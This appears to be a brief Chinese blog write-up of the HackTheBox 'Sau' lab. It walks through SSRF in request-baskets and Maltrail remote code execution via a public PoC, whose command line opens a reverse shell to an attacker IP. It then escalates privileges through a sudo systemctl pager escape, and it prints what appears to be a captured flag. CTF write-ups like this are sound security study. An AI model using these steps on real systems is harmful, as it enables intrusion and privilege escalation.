HTB-Sau
1 | ip='10.129.229.26' |
开了22,80,8338,55555端口


类似一个dnslog,https://github.com/darklynx/request-baskets

似乎有个CVE

SSRF
创建一个转发URL

转到本地

改成127就能访问内网


MailTrail RCE
之前测试也证明能出网,所以直接弹shell
1 | python poc.py 10.10.16.42 9999 http://10.129.229.26:55555/sutrw65 |

提权


1 | cat /etc/systemd/system/trail.service |
HTB提示systemctl版本号,看来提权从这里找

1 | sudo /usr/bin/systemctl status trail.service |
systemctl 中有一个功能,如果终端窗口的大小小于任何输出行的长度,就会使用pager less来输出信息而不是使用cat。而Pager less可以执行命令
把窗口调小一点执行命令就会触发,实际systemctl status输出基本都会比窗口大

收工

2e815d919a73c08f8c627f4d90f10f51
- 标题: HTB-Sau
- 作者: metafa1ica
- 创建于 : 2025-07-29 00:01:10
- 更新于 : 2025-08-17 13:29:28
- 链接: https://metafa1ica.github.io/post/56262cca040f/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论